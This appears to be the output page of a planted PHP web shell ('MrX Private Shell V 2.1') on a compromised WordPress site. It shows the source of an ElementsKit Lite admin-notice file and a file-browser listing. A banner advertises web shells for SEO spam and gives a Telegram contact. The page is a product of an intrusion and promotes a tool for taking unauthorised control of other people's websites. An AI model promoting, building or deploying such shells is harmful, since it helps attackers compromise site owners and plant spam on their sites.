__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace ElementsKit_Lite\Libs\Pro_Label;
defined( 'ABSPATH' ) || exit;
trait Admin_Notice {
public function footer_alert_box() {
include 'views/modal.php';
}
public function show_go_pro_notice() {
\Oxaim\Libs\Notice::instance( 'elementskit-lite', 'go-pro-noti2ce' )
->set_dismiss( 'global', ( 3600 * 24 * 300 ) )
->set_type( 'warning' )
->set_html(
'
<div class="ekit-go-pro-notice">
<strong>Thank you for using ElementsKit Lite.</strong> To get more amazing features and the outstanding pro ready-made layouts, please get the <a style="color: #FCB214;" target="_blank" href="https://wpmet.com/elementskit-pricing">Premium Version</a>.
</div>
'
)
->call();
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| views | Folder | 0775 |
|
|
| admin-notice.php | File | 744 B | 0775 |
|
| init.php | File | 703 B | 0775 |
|